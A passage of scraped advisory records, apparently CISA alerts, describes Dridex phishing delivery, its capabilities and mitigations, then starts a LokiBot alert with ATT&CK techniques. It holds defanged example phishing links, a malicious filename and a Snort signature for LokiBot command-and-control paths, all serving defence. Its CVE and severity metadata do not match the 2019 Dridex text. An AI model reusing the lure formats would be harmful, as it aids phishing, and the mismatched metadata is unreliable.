e-mail underwent virus scanning, or may simply direct the victim toward the link or attachment. In other cases, the body may include a long, substantive message, providing multiple points of contact and context for the malicious attachment. Attachment and hyperlink names vary from random sets of numbers or imitation automatic filenames from scanners to filenames purporting to reference financial records. Attachments may or may not have direct references using the same file name or strings of numbers in the bodies of the e-mails.\n\n**Example Links and Filenames** (Note: link information is representative. 
Italicized statements are automatically generated by the cloud storage provider. # represents a random number.):\n\n * Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(_Cloud Services Provider_)[.]COM/S/(_Cloud Account Value_)/RECENT%20WIRE%20PAYMENT%######.SCR?(_Cloud Provided Sequence_)\n * Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(_Cloud Services Provider_)[.]COM/S/(_Cloud Account Value_)/AUTOMATEDCLEARINGHOUSE%20PAYMENT####.DOC?(_Cloud Provided Sequence_)\n * Malicious File: ID201NLD0012192016.DOC\n\nAttachments or eventual downloads can take a variety of formats. In some instances, malware downloaders are concealed in compressed files using the ZIP or RAR file formats. Occasionally compressed files within compressed files (double zipped) are used. The compressed files can include extensible markup language (.xml), Microsoft Office (.doc, .xls), Visual Basic (.vbs), JavaScript (.jar), or portable document format (.pdf) files. Many of the files, rather than containing the actual malware, contain hidden or obfuscated macros. Upon activation, the macros reach out to a command and control server, FTP server, or cloud storage site to download the actual Dridex malware. In other cases, macros launch scripts that extract executables embedded in the document as opposed to downloading the payload.\n\nBy default, software generally prevents execution of macros without user permission. Attached files, particularly .doc and .xls files, contain instructions on how a user should enable content and specifically macros, effectively using social engineering to facilitate the download. Malicious files sometimes even include screenshots of the necessary actions to enable macros.\n\n## Malware Capabilities\n\nDridex malware operates from multiple modules that may be downloaded together or following the initial download of a \u201cloader\u201d module. 
Modules include provisions for capturing screenshots, acting as a virtual machine, or incorporating the victim machine into a botnet. Through its history and development, Dridex has used several exploits and methods for execution, including modification of directory files, using system recovery to escalate privileges, and modification of firewall rules to facilitate peer-to-peer communication for extraction of data. Recent versions of Dridex exploit vulnerability CVE-2017-0199, which allows remote execution of code. This vulnerability is specific to Microsoft Office and WordPad. Microsoft released a patch in 2017.\n\nOnce downloaded and active, Dridex has a wide range of capabilities, from downloading additional software to establishing a virtual network to deleting files. The primary threat to financial activity is Dridex\u2019s ability to infiltrate browsers, detect access to online banking applications and websites, and inject malware or keylogging software, via API hooking, to steal customer login information. Dridex modules package, encrypt, and transmit captured information, screenshots, etc., via peer-to-peer (P2P) networks in XML format or, as seen in newer versions, in binary format. After stealing the login data, the attackers have the potential to facilitate fraudulent automated clearing house (ACH) and wire transfers, open fraudulent accounts, and potentially adapt victim accounts for other scams involving business e-mail compromise or money mule activity.\n\nThe Dridex malware has evolved through several versions since its inception, partially to adapt to updated browsers. Although the characteristics described reflect some of the most recent configurations, actors continue to identify and exploit vulnerabilities in widely used software.\n\n## Dridex Malware and Variants\n\nWhile Dridex is among the most prevalent sources of infection, previous variants and similar malware continue to represent a threat. 
Dridex is itself an improved variant of the Cridex and Bugat Trojans that preceded it, and it shares some of their code. Although the previous variants\u2019 theft activities operate in mostly the same way, the P2P communication aspects of Dridex improve its concealment and redundancy.\n\n### Ransomware\n\nActors distributing Dridex likely employ ransomware with similar configurations. Code for BitPaymer, also known as Friedex, includes numerous similarities to Dridex, despite its function as ransomware rather than data extraction. The two malware families use the same mechanics for several functions, and the authors compiled the code at nearly the same time. The ransomware distributed through these malware families has targeted U.S. financial institutions and resulted in data and financial loss.\n\nLocky ransomware operates using the same delivery method for the downloader, with similar subject lines and attachments. Attackers also use the same botnets to deliver both Dridex and Locky ransomware, sometimes simultaneously. Variants of Locky include Zepto and Osiris. Locky ransomware and its variants have a wide footprint, with varying impact depending on victim IT policies and practices and network configurations.\n\n## Dridex-related Activity\n\nAlthough the highest infection rates took place in late 2015 and early 2016, concurrent with Locky ransomware distribution, Dridex continues to impact numerous countries. The Dridex hackers appear to direct the majority of attacks at English-speaking countries. Cybersecurity industry reporting attributes Dridex, BitPaymer, and Locky campaigns, as well as other massive malware spam (malspam) campaigns, to actors known alternately as Evil Corp or TA505. 
(Note: some cybersecurity industry reporting simply refers to the actors as \u201cDridex\u201d or the \u201cDridex hackers.\u201d) Actors distribute the malware via massive spam campaigns, sending up to millions of messages per day, although volume of messages varies widely.\n\n## Indicators of Compromise\n\nThe indicators associated with the activity described in this report (Dridex-related e-mail addresses and IP addresses) are provided in the downloadable CSV and STIX files linked above.\n\n### Mitigations\n\nTreasury and CISA encourage users and organizations to:\n\n 1. Contact law enforcement immediately to report any identified activity related to Dridex malware or its derivatives. Please see contact information for FBI and CISA at the end of this report.\n 2. Incorporate the indicators of compromise identified in this report into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity. Note that the published list is not a comprehensive list of all indicators associated with this activity.\n 3. Report suspicious activity, highlighting the presence of \u201cCyber Event Indicators.\u201d Indicators of Compromise, such as suspicious e-mail addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. FinCEN welcomes voluntary SAR filing in circumstances where reporting is not required.\n\n## Recommendations for All Organizations\n\nThe following mitigation recommendations respond directly to Dridex TTPs:\n\n * Ensure systems are set by default to prevent execution of macros.\n * Inform and educate employees on the appearance of phishing messages, especially those used by the hackers for distribution of malware in the past.\n * Update intrusion detection and prevention systems frequently to ensure the latest variants of malware and downloaders are included.\n * Conduct regular backups of data, ensuring backups are protected from potential ransomware attack.\n * Exercise employees\u2019 response to phishing messages and unauthorized intrusion.\n * If there is any doubt about message validity, call and confirm the message with the sender using a number or e-mail address already on file.\n\nTreasury and CISA remind users and administrators to use the following best practices to strengthen the security posture of their 
organization\u2019s systems:\n * Maintain up-to-date antivirus signatures and engines.\n * Keep operating system patches up-to-date.\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Restrict users\u2019 ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.\n * Enforce a strong password policy and require regular password changes.\n * Exercise caution when opening email attachments even if the attachment is expected and the sender appears to be known.\n * Enable a personal firewall on workstations, and configure it to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \u201ctrue file type\u201d (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the Internet before executing.\n * Maintain situational awareness of the latest threats.\n * Implement appropriate access control lists.\n * Exercise cybersecurity procedures and continuity of operations plans to enhance and maintain ability to respond during and following a cyber incident.\n\nThe National Institute of Standards and Technology (NIST) has published additional information on malware incident prevention and handling in their Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops:\n\n * <https://www.nist.gov/publications/guide-malware-incident-prevention-and-handling-desktops-and-laptops>\n\n## Why Best Practices Matter\n\nThe National Security Agency (NSA) recently published its _Top Ten Cybersecurity Mitigation Strategies_ (This 
is the current website for Top 10 mitigation strategies: <https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1>). Aligned with the NIST Cybersecurity Framework, the Strategies offer a risk-based approach to mitigating exploitation techniques used by Advanced Persistent Threat (APT) actors.\n\nThe _Strategies_ counter a broad range of exploitation techniques used by malicious cyber actors. NSA\u2019s mitigations set priorities for enterprise organizations to minimize mission impact. The mitigations also build upon the NIST Cybersecurity Framework functions to manage cybersecurity risk and promote a defense-in-depth security posture. The mitigation strategies are ranked by effectiveness against known APT tactics. Additional strategies and best practices will be required to mitigate the occurrence of new tactics.\n\n 1. **Update and Upgrade Software Immediately.** Apply all available software updates, automate the process to the extent possible, and use an update service provided directly from the vendor. Automation is necessary because threat actors study patches and create exploits, often soon after a patch is released. These \u201cN-day\u201d exploits can be as damaging as a zero-day. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to assure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender\u2019s patch cycle.\n 2. **Defend Privileges and Accounts.** Assign privileges based on risk exposure and as required to maintain operations. Use a Privileged Access Management (PAM) solution to automate credential management and fine-grained access control. Another way to manage privilege is through tiered administrative access, in which each higher tier provides additional access but is limited to fewer personnel. 
Create procedures to securely reset credentials (e.g., passwords, tokens, tickets). Privileged accounts and services must be controlled because threat actors continue to target administrator credentials to access high-value assets, and to move laterally through the network.\n 3. **Enforce Signed Software Execution Policies.** Use a modern operating system that enforces signed software execution policies for scripts, executables, device drivers, and system firmware. Maintain a list of trusted certificates to prevent and detect the use and injection of illegitimate executables. Execution policies, when used in conjunction with a secure boot capability, can assure system integrity. Application allow listing should be used with signed software execution policies to provide greater control. Allowing unsigned software enables threat actors to gain a foothold and establish persistence through embedded malicious code.\n 4. **Exercise a System Recovery Plan.** Create, review, and exercise a system recovery plan to ensure the restoration of data as part of a comprehensive disaster recovery strategy. The plan must protect critical data, configurations, and logs to ensure continuity of operations during unexpected events. For additional protection, backups should be encrypted, stored offsite, offline when possible, and support complete recovery and reconstitution of systems and devices. Perform periodic testing and evaluate the backup plan. Update the plan as necessary to accommodate the ever-changing network environment. A recovery plan is a necessary mitigation for natural disasters as well as malicious threats including ransomware.\n 5. **Actively Manage Systems and Configurations.** Take inventory of network devices and software. Remove unwanted, unneeded, or unexpected hardware and software from the network. Starting from a known baseline reduces the attack surface and establishes control of the operational environment. 
Thereafter, actively manage devices, applications, operating systems, and security configurations. Active enterprise management ensures that systems can adapt to dynamic threat environments while scaling and streamlining administrative operations.\n 6. **Continuously Hunt for Network Intrusions.** Take proactive steps to detect, contain, and remove any malicious presence within the network. Enterprise organizations should assume that a compromise has taken place and use dedicated teams to continuously seek out, contain, and remove threat actors within the network. Passive detection mechanisms, such as logs, Security Information and Event Management (SIEM) products, Endpoint Detection and Response (EDR) solutions, and other data analytic capabilities are invaluable tools to find malicious or anomalous behaviors. Active pursuits should also include hunt operations and penetration testing using well-documented incident response procedures to address any discovered breaches in security. Establishing proactive steps will transition the organization beyond basic detection methods, enabling real-time threat detection and remediation using a continuous monitoring and mitigation strategy.\n 7. **Leverage Modern Hardware Security Features.** Use hardware security features like Unified Extensible Firmware Interface (UEFI) Secure Boot, Trusted Platform Module (TPM), and hardware virtualization. Schedule older devices for a hardware refresh. Modern hardware features increase the integrity of the boot process, provide system attestation, and support features for high-risk application containment. Using a modern operating system on outdated hardware results in a reduced ability to protect the system, critical data, and user credentials from threat actors.\n 8. **Segregate Networks Using Application-Aware Defenses.** Segregate critical networks and services. 
Deploy application-aware network defenses to block improperly formed traffic and restrict content, according to policy and legal authorizations. Traditional intrusion detection based on known-bad signatures is quickly decreasing in effectiveness due to encryption and obfuscation techniques. Threat actors hide malicious actions and remove data over common protocols, making the need for sophisticated, application-aware defensive mechanisms critical for modern network defenses.\n 9. **Integrate Threat Reputation Services.** Leverage multi-sourced threat reputation services for files, DNS, URLs, IPs, and email addresses. Reputation services assist in the detection and prevention of malicious events, allow for rapid global responses to threats, reduce exposure to known threats, and provide access to a much larger threat analysis and tipping capability than an organization can provide on its own. Emerging threats, whether targeted or global campaigns, occur faster than most organizations can handle, resulting in poor coverage of new threats. Multi-source reputation and information sharing services can provide a more timely and effective security posture against dynamic threat actors.\n 10. **Transition to Multi-Factor Authentication.** Prioritize protection for accounts with elevated privileges, remote access, and/or used on high-value assets. Physical token-based authentication systems should be used to supplement knowledge-based factors such as passwords and PINs. 
Organizations should migrate away from single factor authentication, such as password-based systems, which are subject to poor user choices and susceptible to credential theft, forgery, and reuse across multiple systems.\n\n### Contact Information\n\n**Reporting Suspected Malicious Activity**\n\nTo report an intrusion and request resources for incident response or technical assistance, contact CISA ([central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ) or 888-282-0870), FBI through a local field office (<https://www.fbi.gov/contact-us/field-offices>), or FBI\u2019s Cyber Division (CyWatch@fbi.gov or 855-292-3937).\n\nInstitutions should determine whether filing of a Suspicious Activity Report (\u201cSAR\u201d) is required under Bank Secrecy Act regulations. In instances where filing is not required, institutions may file a SAR voluntarily to aid FinCEN and law enforcement efforts in protecting the financial sector. Financial institutions are encouraged to provide relevant cyber-related information and indicators in their SAR reporting. For questions regarding cyber SAR filing, please contact the FinCEN Resource Center (FRC@fincen.gov or 1-800-767-2825).\n\n## **Open-Source Reporting On Dridex**\n\nThe following represents an alphabetized selection of open-source reporting by U.S. 
government and industry sources on Dridex malware and its derivatives:\n\n * \u201cDridex P2P Malware,\u201d US-CERT Alert (TA15-286A), <https://www.us-cert.gov/ncas/alerts/TA15-286A>, 13 October 2015.\n * \u201cDridex Threat Profile,\u201d New Jersey Cybersecurity & Communications Integration Cell, <https://www.cyber.nj.gov/threat-profiles/trojan-variants/dridex>, accessed 15 April 2019.\n * Alert Logic, \u201cDridex malware has evolved to Locky Ransomware,\u201d No date, <https://www.alertlogic.com/resources/threat-reports/dridex-malware-has-evolved-to-locky-ransomware/>, accessed 11 March 2019.\n * Avast Blog, \u201cA closer look at the Locky ransomware,\u201d 10 March 2016, <https://blog.avast.com/a-closer-look-at-the-locky-ransomware>, accessed 6 February 2019.\n * Brett Stone-Gross, Ph.D., \u201cDridex (Bugat v5) Botnet Takeover Operation,\u201d Secureworks, 13 October 2015, <https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation>, accessed 6 February 2019.\n * Brewster, Thomas, \u201cCops Knock Down Dridex Malware that Earned \u2018Evil Corp\u2019 Cybercriminals At Least $50 Million,\u201d Forbes, 13 October 2015, <https://www.forbes.com/sites/thomasbrewster/2015/10/13/dridex-botnet-takedown/#2b883f00415b>.\n * Chandler, Andy, \u201cFBI announces Dridex gang indictment and praises Fox-IT,\u201d Fox-IT, 13 October 2015, <https://www.fox-it.com/en/about-fox-it/corporate/news/fbi-announces-dridex-gang-indictments-praises-fox/>, accessed 7 February 2019.\n * DHS CISA, \u201cAlert (TA15-286A), Dridex P2P Malware,\u201d <https://www.us-cert.gov/ncas/alerts/TA15-286A>, accessed 4 June 2019.\n * Eduard Kovacs, \u201cDridex still active after takedown attempt,\u201d Security Week, 19 October 2015, <https://www.securityweek.com/dridex-still-active-after-takedown-attempt>, accessed 11 March 2019.\n * Geoff White, \u201cHow the Dridex Gang makes millions from bespoke 
ransomware,\u201d Forbes, 26 September 2018, <https://www.forbes.com/sites/geoffwhite/2018/09/26/how-the-dridex-gang-makes-millions-from-bespoke-ransomware/>, accessed 11 March 2019.\n * MS-ISAC, \u201cCybercrime Technical Desk Reference,\u201d 31 August 2018, <https://www.cisecurity.org/wp-content/uploads/2018/09/MS-ISAC-Cyber-Crime-Technical-Desk-Reference.pdf>, accessed 6 February 2019.\n * O\u2019Brien, Dick. \u201cDridex: Tidal waves of spam pushing dangerous financial Trojan,\u201d Symantec, February 2016, <http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf>, accessed 4 February 2019.\n * Poslu\u0161n\u00fd, Michal, \u201cFriedEx: BitPaymer ransomware the work of Dridex authors,\u201d welivesecurity by ESET, 26 January 2018, <https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/>, accessed 6 February 2019.\n * Proofpoint, \u201cDridex Campaigns Hitting Millions of Recipients Using Unpatched Microsoft Zero-Day,\u201d <https://www.proofpoint.com/us/threat-insight/post/dridex-campaigns-millions-recipients-unpatched-microsoft-zero-day>, accessed 5 February 2019.\n * Proofpoint, \u201cHigh-Volume Dridex Banking Trojan Campaigns Return,\u201d <https://www.proofpoint.com/us/threat-insight/post/high-volume-dridex-campaigns-return>, accessed 1 February 2019.\n * Proofpoint, \u201cThreat Actor Profile: TA505, From Dridex to GlobeImposter,\u201d <https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter>, accessed 6 February 2019.\n * Roland Dela Paz and Ran Mosessco. \u201cNew year, new look \u2013 Dridex via compromised FTP,\u201d ForcePoint, 18 January 2018, <https://blogs.forcepoint.com/blog/security-labs/new-year-new-look-dridex-compromised-ftp>, accessed 4 February 2019.\n * Sanghavi, Mithun. 
\u201cDRIDEX and how to overcome it.\u201d Symantec Official Blog, 30 March 2015, <https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it>, accessed 4 February 2019.\n * Security Intelligence Blog, \u201cURSNIF, EMOTET, DRIDEX and BitPaymer Gangs Linked by a Similar Loader,\u201d Trend Micro, 18 December 2018, <https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/>, accessed 6 February 2019.\n * Talos Group, \u201cThreat Spotlight: Spam Served With a Side of Dridex,\u201d Cisco Blogs, 6 April 2015, <https://blogs.cisco.com/security/talos/spam-dridex>, accessed 4 February 2019.\n\n### Revisions\n\nDecember 5, 2019: Initial version|December 5, 2019: Added links to Treasury and FBI press releases|January 2, 2020: Updated CISA contact information\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-30T12:00:00", "type": "ics", "title": "Dridex Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-06-30T12:00:00", "id": "AA19-339A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-339a", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:33:48", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the [Multi-State Information Sharing & Analysis Center (MS-ISAC)](<https://www.cisecurity.org/ms-isac/>).\n\nCISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA\u2019s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot is credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, which makes it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.\n\n### Technical Details\n\nLokiBot\u2014also known as Lokibot, Loki PWS, and Loki-bot\u2014employs Trojan malware to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials.\n\n * The malware steals credentials through the use of a keylogger to monitor browser and desktop activity (_Credentials from Password Stores_ [[T1555](<https://attack.mitre.org/versions/v7/techniques/T1555/>)]). 
\n * (_Credentials from Password Stores: Credentials from Web Browsers_ [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)])\n * (_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)])\n * LokiBot can also create a backdoor into infected systems to allow an attacker to install additional payloads (_Event Triggered Execution: Accessibility Features_ [[T1546.008](<https://attack.mitre.org/versions/v7/techniques/T1546/008/>)]).\n * Malicious cyber actors typically use LokiBot to target Windows and Android operating systems and distribute the malware via email, malicious websites, text, and other private messages (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002/>)]). See figure 1 for enterprise techniques used by LokiBot.\n\n_Figure 1: MITRE ATT&CK enterprise techniques used by LokiBot_\n\nSince LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications, including the following:\n\n * **February 2020:** Trend Micro identified cyber actors using LokiBot to impersonate a launcher for Fortnite\u2014a popular video game.[[1](<https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/>)]\n * **August 2019:** FortiGuard SE researchers discovered a malspam campaign distributing LokiBot information-stealing payloads in a spearphishing attack on a U.S. 
manufacturing company.[[2](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.>)]\n * **August 2019:** Trend Micro researchers reported LokiBot malware source code being hidden in image files spread as attachments in phishing emails.[[3](<https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/>)]\n * **June 2019:** Netskope uncovered LokiBot being distributed in a malspam campaign using ISO image file attachments.[[4](<https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files>)]\n * **April 2019:** Netskope uncovered a phishing campaign using malicious email attachments with LokiBot malware to create backdoors onto infected Windows systems and steal sensitive information.[[5](<https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files>)]\n * **February 2018:** Trend Micro discovered CVE-2017-11882 being exploited in an attack using the Windows Installer service to deliver LokiBot malware.[[6](<https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html>)]\n * **October 2017:** SfyLabs identified cyber actors using LokiBot as an Android banking trojan that turns into ransomware.[[7](<https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/>)]\n * **May 2017:** Fortinet reported malicious actors using a PDF file to spread a new LokiBot variant capable of stealing credentials from more than 100 different software tools.[[8](<https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file>)]\n * **March 2017:** Check Point discovered LokiBot malware found pre-installed on Android 
devices.[[9](<https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/>)]\n * **December 2016:** Dr.Web researchers identified a new LokiBot variant targeting Android core libraries.[[10](<https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/>)]\n * **February 2016:** Researchers discovered the LokiBot Android Trojan infecting the core Android operating system processes.[[11](<https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot>)]\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, [LokiBot](<https://attack.mitre.org/versions/v7/software/S0447/>) uses the ATT&CK techniques listed in table 1.\n\n_Table 1: LokiBot ATT&CK techniques_\n\nTechnique\n\n| \n\nUse \n \n---|--- \n \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)]\n\n| \n\nLokiBot has the ability to discover the domain name of the infected host. \n \n_Obfuscated Files or Information_ [[T1027](<https://attack.mitre.org/versions/v7/techniques/T1027/>)]\n\n| \n\nLokiBot has obfuscated strings with base64 encoding. \n \n_Obfuscated Files or Information: Software Packing_ [[T1027.002](<https://attack.mitre.org/versions/v7/techniques/T1027/002/>)]\n\n| \n\nLokiBot has used several packing methods for obfuscation. \n \n_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)]\n\n| \n\nLokiBot has the ability to discover the username on the infected host. \n \n_Exfiltration Over C2 Channel_ [[T1041](<https://attack.mitre.org/versions/v7/techniques/T1041/>)]\n\n| \n\nLokiBot has the ability to initiate contact with command and control to exfiltrate stolen data. \n \n_Process Injection: Process Hollowing_ [[T1055.012](<https://attack.mitre.org/versions/v7/techniques/T1055/012/>)]\n\n| \n\nLokiBot has used process hollowing to inject into the legitimate Windows process vbc.exe. 
\n \n_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)]\n\n| \n\nLokiBot has the ability to capture input on the compromised host via keylogging. \n \n_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)]\n\n| \n\nLokiBot has used Hypertext Transfer Protocol for command and control. \n \n_System Information Discovery_ [[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]\n\n| \n\nLokiBot has the ability to discover the computer name and Windows product name/version. \n \n_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002/>)]\n\n| \n\nLokiBot has been executed through malicious documents contained in spearphishing emails. \n \n_Credentials from Password Stores_ [[T1555](<https://attack.mitre.org/versions/v7/techniques/T1555/>)]\n\n| \n\nLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, and File Transfer Protocol and Secure File Transfer Protocol clients. \n \n_Credentials from Password Stores: Credentials from Web Browsers_ [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)]\n\n| \n\nLokiBot has demonstrated the ability to steal credentials from multiple applications and data sources, including Safari, Chromium-based, and Mozilla Firefox-based web browsers. \n \n_Hide Artifacts: Hidden Files and Directories_ [[T1564.001](<https://attack.mitre.org/versions/v7/techniques/T1564/001/>)]\n\n| \n\nLokiBot has the ability to copy itself to a hidden file and directory. 
\n \n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signature for use in detecting network activity associated with LokiBot activity.\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"Lokibot:HTTP URI POST contains '/*/fre.php' post-infection\"; flow:established,to_server; flowbits:isnotset,.tagged; content:\"/fre.php\"; http_uri; fast_pattern:only; urilen:<50,norm; content:\"POST\"; nocase; http_method; pcre:\"/\\/(?:alien|loky\\d|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll\\/NW|wrk|job|five\\d?|donemy|animation\\dkc|love|Masky|v\\d|lifetn|Ben)\\/fre\\\\.php$/iU\"; flowbits:set,.tagged;classtype:http-uri; metadata:service http; metadata:pattern HTTP-P001,)\n\n### Mitigations\n\nCISA and MS-ISAC recommend that federal, state, local, tribal, territorial government, private sector users, and network administrators consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>).\n * Keep operating system patches up to date. See [Understanding Patches and Software Updates](<https://www.us-cert.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Enforce multi-factor authentication. See [Supplementing Passwords ](<https://www.us-cert.gov/ncas/tips/ST05-012>)for more information.\n * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. 
See [Choosing and Protecting Passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\nCenter for Internet Security Security Event Primer \u2013 Malware: <https://www.cisecurity.org/white-papers/security-event-primer-malware/> \nMITRE ATT&CK \u2013 LokiBot: [https://attack.mitre.org/software/S0447/](<https://attack.mitre.org/versions/v7/software/S0447/>) \nMITRE ATT&CK for Enterprise: [https://attack.mitre.org/matrices/enterprise/](<https://attack.mitre.org/versions/v7/matrices/enterprise/>)\n\n### References\n\n[[1] Trend Micro: LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File 
